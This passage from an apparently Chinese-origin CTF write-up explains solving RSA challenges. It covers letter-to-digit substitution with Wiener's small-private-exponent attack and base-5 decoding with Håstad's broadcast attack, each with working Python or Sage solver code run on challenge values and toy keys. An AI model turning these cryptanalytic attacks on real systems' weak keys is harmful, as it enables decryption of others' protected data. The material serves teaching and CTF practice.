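DP = 6500795702216834621109042351193261530650043841056252930930949663358625016881832840728066026150264693076109354874099841380454881716097778307268116910582929
DQ = 783472263673553449019532580386470672380574033551303889137911760438881683674556098098256795673512201963002175438762767516968043599582527539160811120550041
C = 24722305403887382073567316467649080662631552905960229399079107995602154418176056335800638887527614164073530437657085079676157350205351945222989351316076486573599576041978339872265925062764318536089007310270278526159678937431903862892400747915525118983959970607934142974736675784325993445942031372107342103852

if __name__ == "__main__":
    p, q, e, dp, dq = toy_key()
    assert rsa_crt_decrypt(pow(65, e, p * q), p, q, dp, dq) == 65
    print(int_to_bytes(rsa_crt_decrypt(C, P, Q, DP, DQ)))
```

This is the same arithmetic a TLS or SSH implementation does with a CRT-form private key, which is exactly why leaking dp and dq is as bad as leaking d.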

WTF

N = “lObAbAbSBlZOOEBllOEbblTlOAbOlTSBATZBbOSAEZTZEAlSOggTggbTlEgBOgSllEEOEZZOSSAOlBlAgBBBBbbOOSSTOTEOllbZgElgbZSZbbSTTOEBZZSBBEEBTgESEgAAAlAOAEbTZBZZlOZSOgBAOBgOAZEZbOBZbETEOSBZSSElSSZlbBSgbTBOTBSBBSOZOAEBEBZEZASbOgZBblbblTSbBTObAElTSTOlSTlATESEEbSTBOlBlZOlAOETAZAgTBTSAEbETZOlElBEESObbTOOlgAZbbOTBOBEgAOBAbZBObBTg”
e = “lBlbSbTASTTSZTEASTTEBOOAEbEbOOOSBAgABTbZgSBAZAbBlBBEAZlBlEbSSSETAlSOlAgAOTbETAOTSZAZBSbOlOOZlZTETAOSSSlTZOElOOABSZBbZTSAZSlASTZlBBEbEbOEbSTAZAZgAgTlOTSEBEAlObEbbgZBlgOEBTBbbSZAZBBSSZBOTlTEAgBBSZETAbBgEBTATgOZBTllOOSSTlSSTOSSZSZAgSZATgbSOEOTgTTOAABSZEZBEAZBOOTTBSgSZTZbOTgZTTElSOATOAlbBZTBlOTgOSlETgTBOglgETbT”
c = “SOSBOEbgOZTZBEgZAOSTTSObbbbTOObETTbBAlOSBbABggTOBSObZBbbggggZZlbBblgEABlATBESZgASBbOZbASbAAOZSSgbAOZlEgTAlgblBTbBSTAEBgEOEbgSZgSlgBlBSZOObSlgAOSbbOOgEbllAAZgBATgEAZbBEBOAAbZTggbOEZSSBOOBZZbAAlTBgBOglTSSESOTbbSlTAZATEOZbgbgOBZBBBBTBTOSBgEZlOBTBSbgbTlZBbbOBbTSbBASBTlglSEAEgTOSOblAbEgBAbOlbOETAEZblSlEllgTTbbgb”

emmm, a substitution followed by Wiener's attack.

‘O’ –> 0
‘l’ –> 1
‘Z’ –> 2
‘E’ –> 3
‘A’ –> 4
‘S’ –> 5
‘b’ –> 6
‘T’ –> 7
‘B’ –> 8
‘g’ –> 9

# Sage script (Python 2 syntax, as in the write-ups of the time): decode the
# letter alphabet into digits, then run Wiener's attack.
from sage.all import *
from Crypto.Util.number import *

def mapping(str1):
    # flag any character outside the ten-letter alphabet, then substitute
    for i in str1:
        if i not in "AbEglOSBTZ":
            print i
    str1 = str1.replace("O", '0')
    str1 = str1.replace("l", '1')
    str1 = str1.replace("Z", '2')
    str1 = str1.replace("E", '3')
    str1 = str1.replace("A", '4')
    str1 = str1.replace("S", '5')
    str1 = str1.replace("b", '6')
    str1 = str1.replace("T", '7')
    str1 = str1.replace("B", '8')
    str1 = str1.replace("g", '9')
    return str1

def wiener(e, n):
    # try every convergent of e/n as d; accept the one that decrypts a test message
    m = 12345
    c = pow(m, e, n)
    lst = continued_fraction(Integer(e)/Integer(n))
    conv = lst.convergents()
    for i in conv:
        k = i.numerator()
        d = int(i.denominator())
        try:
            m1 = pow(c, d, n)
            if m1 == m:
                print "[*] Found d: ", d
                return d
        except:
            continue
    return -1

N = "lObAbAbSBlZOOEBllOEbblTlOAbOlTSBATZBbOSAEZTZEAlSOggTggbTlEgBOgSllEEOEZZOSSAOlBlAgBBBBbbOOSSTOTEOllbZgElgbZSZbbSTTOEBZZSBBEEBTgESEgAAAlAOAEbTZBZZlOZSOgBAOBgOAZEZbOBZbETEOSBZSSElSSZlbBSgbTBOTBSBBSOZOAEBEBZEZASbOgZBblbblTSbBTObAElTSTOlSTlATESEEbSTBOlBlZOlAOETAZAgTBTSAEbETZOlElBEESObbTOOlgAZbbOTBOBEgAOBAbZBObBTg"
e = "lBlbSbTASTTSZTEASTTEBOOAEbEbOOOSBAgABTbZgSBAZAbBlBBEAZlBlEbSSSETAlSOlAgAOTbETAOTSZAZBSbOlOOZlZTETAOSSSlTZOElOOABSZBbZTSAZSlASTZlBBEbEbOEbSTAZAZgAgTlOTSEBEAlObEbbgZBlgOEBTBbbSZAZBBSSZBOTlTEAgBBSZETAbBgEBTATgOZBTllOOSSTlSSTOSSZSZAgSZATgbSOEOTgTTOAABSZEZBEAZBOOTTBSgSZTZbOTgZTTElSOATOAlbBZTBlOTgOSlETgTBOglgETbT"
c = "SOSBOEbgOZTZBEgZAOSTTSObbbbTOObETTbBAlOSBbABggTOBSObZBbbggggZZlbBblgEABlATBESZgASBbOZbASbAAOZSSgbAOZlEgTAlgblBTbBSTAEBgEOEbgSZgSlgBlBSZOObSlgAOSbbOOgEbllAAZgBATgEAZbBEBOAAbZTggbOEZSSBOOBZZbAAlTBgBOglTSSESOTbbSlTAZATEOZbgbgOBZBBBBTBTOSBgEZlOBTBSbgbTlZBbbOBbTSbBASBTlglSEAEgTOSOblAbEgBAbOlbOETAEZblSlEllgTTbbgb"
N = int(mapping(N))
e = int(mapping(e))
c = int(mapping(c))
d = wiener(e, N)
print long_to_bytes(pow(c, d, N))

Ugh, this kind of challenge makes my stomach hurt: a bit of guesswork, but simple, and not getting it feels bad.
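The Sage script above works, but the Sage dependency is not needed. Here is an added example of mine that does the same attack with the standard library only: the letter-to-digit substitution as a translate table, the continued-fraction convergents of e/N, and the classic Wiener test that recovers p and q from each candidate d rather than checking a trial encryption. The demo key (N=90581, e=17993, d=5, the usual textbook example) is constructed; the mapped N and e from the challenge go into wiener() the same way.

```python
from math import isqrt


def letters_to_int(s, alphabet="OlZEASbTBg"):
    """The substitution from the write-up: O l Z E A S b T B g stand for 0..9."""
    return int(s.translate(str.maketrans(alphabet, "0123456789")))


def convergents(num, den):
    """Yield the convergents h/k of the continued fraction of num/den."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while den:
        a, r = divmod(num, den)
        h0, h1 = h1, a * h1 + h0
        k0, k1 = k1, a * k1 + k0
        yield h1, k1
        num, den = den, r


def wiener(e, n):
    """Wiener's attack. When d is small, some convergent k/d of e/n satisfies
    e*d - 1 = k*phi(n). Each candidate is verified by recovering p and q from
    phi, which is stronger than checking a trial encryption. Returns (d, p, q)
    or None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1                       # p + q
        disc = s * s - 4 * n                  # (p - q)^2
        if disc < 0:
            continue
        t = isqrt(disc)
        if t * t == disc and (s + t) % 2 == 0:
            return d, (s + t) // 2, (s - t) // 2
    return None


def int_to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # Constructed demo key (the usual textbook Wiener example): d = 5.
    n, e = 90581, 17993
    print(wiener(e, n))                       # (5, 379, 239)
    # For the challenge: N, e, c = letters_to_int(...) of the three strings
    # above, then int_to_bytes(pow(c, wiener(e, N)[0], N)).
```

Recovering p and q from phi is the check worth keeping: a convergent that merely decrypts one test message correctly can still be a coincidence, while integer roots of x^2 - (N - phi + 1)x + N = 0 cannot.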

Trinity

Neo, you are the chosen one. The only person who can make sense of these numbers. Do it.

N = 33131032421200003002021431224423222240014241042341310444114020300324300210433321420203120221240340022003120214232243410414310424424121420444444332300024413012202242231020110441104403011330232301410133121430322331240243040240441303324313210101042224013312221140043402322221423140240340320001222102334133334004234312230211341021011022123324130302443133000130340402010444244312013000033411004243201020340144040401000344200122304221144200141300
c = 31002000423403330424420042141441332034130100212303031120234022241030142344031241244024024411020011214114020122403240223213120421301230320442200330000401143410214132122331124324201001414042241134230432220124111240213220310113122122300402200312000211023002334114320140431134031113423014023141220133333314240242313433321130210241311111142443003244012334003404431422340040122411132300024223442044124041102102310022200312321434303012203230104224

N = 30224000004042141014442213333414314001101104432222314441200222024300114114111412322333133130442111302123120432223312012144443421004123221414441324443442430231122214322440230243210224213224403201002011322401112104323214322120342424313404431402221202434310004234200243233114430021421241403341412000434421133022402030122303333432424403120424012230124223201130321122004422241113440301213242031111030244234402112210122441123000220334414014304411
c = 11220020340401343033021412400440442321004132104300030323314142334414422234340104220033403320312403001144001421011210323444031213403212340044434414423302013011013404210222030200241332110202241413044304114424031012102010031010433420423441241142442032121111223203112133031033341442343334332202440012120033333043222342143334412202301244001304140142320221012402443104001341431312112343342411311341442204333042200231414411113414204433340411224034

N = 33220032441004111143422212304312133144210323333242234104134041203423000331442031133310134423121213020031204104432443114103300433311002101302014002001122201230002004134204000400222021022312211131411212433321113223033212402242314121403130314444413440302442011142324442403003000334021303212130321334302040130424333000131402303012103411333440444042124224011310320301334123133000433204030244001132400413032403432343014310240144013024232142402032
c = 10013444120141130322433204124002242224332334011124210012440241402342100410331131441303242011002101323040403311120421304422222200324402244243322422444414043342130111111330022213203030324422101133032212042042243101434342203204121042113212104212423330331134311311114143200011240002111312122234340003403312040401043021433112031334324322123304112340014030132021432101130211241134422413442312013042141212003102211300321404043012124332013240431242

Looks like a broadcast attack, but it didn't work.

Broadcast attack: different moduli n and ciphertexts c, the same plaintext m and public exponent e. Usually e = k and k sets of data are given.

Notice that only the digits 0-4 appear: convert from base 5 to decimal first, then run the broadcast attack...

Ugh, now RSA puts the trap in the very first step orz
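An added example of mine (not the page's script) of the Håstad broadcast attack with that first step included: parse each N and c as base 5, combine the e ciphertexts with the Chinese remainder theorem, and take the exact integer e-th root. The toy key (three small moduli, m=42, e=3) is constructed; the challenge strings above go through parse_base5 the same way.

```python
def crt(residues, moduli):
    """Chinese remainder theorem for pairwise coprime moduli: returns (x, M)."""
    M = 1
    for m in moduli:
        M *= m
    x = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        x += r * Mi * pow(Mi, -1, m)          # pow(.., -1, m) needs Python 3.8+
    return x % M, M


def iroot(x, e):
    """Exact integer e-th root of x, or None if x is not a perfect e-th power."""
    lo, hi = 0, 1
    while hi ** e <= x:
        hi <<= 1
    while lo < hi:                            # smallest r with r**e >= x
        mid = (lo + hi) // 2
        if mid ** e < x:
            lo = mid + 1
        else:
            hi = mid
    return lo if lo ** e == x else None


def hastad_broadcast(pairs, e=3):
    """pairs = [(N1, c1), (N2, c2), ...] for the same m and e. Works when
    m**e < N1*N2*...*Ne, so the CRT value is m**e over the integers and the
    root is exact; a None result means the moduli or e do not fit."""
    if len(pairs) < e:
        raise ValueError("need at least e ciphertexts")
    moduli = [n for n, _ in pairs[:e]]
    residues = [c for _, c in pairs[:e]]
    x, _ = crt(residues, moduli)
    return iroot(x, e)


def parse_base5(s):
    """The trap in this challenge: N and c are written with the digits 0-4."""
    return int(s, 5)


def to_base5(n):
    digits = []
    while n:
        n, d = divmod(n, 5)
        digits.append(str(d))
    return "".join(reversed(digits)) or "0"


def hastad_from_base5(pairs, e=3):
    return hastad_broadcast([(parse_base5(n), parse_base5(c)) for n, c in pairs], e)


def int_to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # Constructed toy: m = 42, e = 3, three small coprime moduli.
    toy = [(101, pow(42, 3, 101)), (103, pow(42, 3, 103)), (107, pow(42, 3, 107))]
    print(hastad_broadcast(toy))                                        # 42
    print(hastad_from_base5([(to_base5(n), to_base5(c)) for n, c in toy]))
```

If the root is not exact, the usual reasons are that the three values were read in the wrong base (the whole point of this challenge), that e is not 3, or that the same plaintext was not actually sent to all recipients.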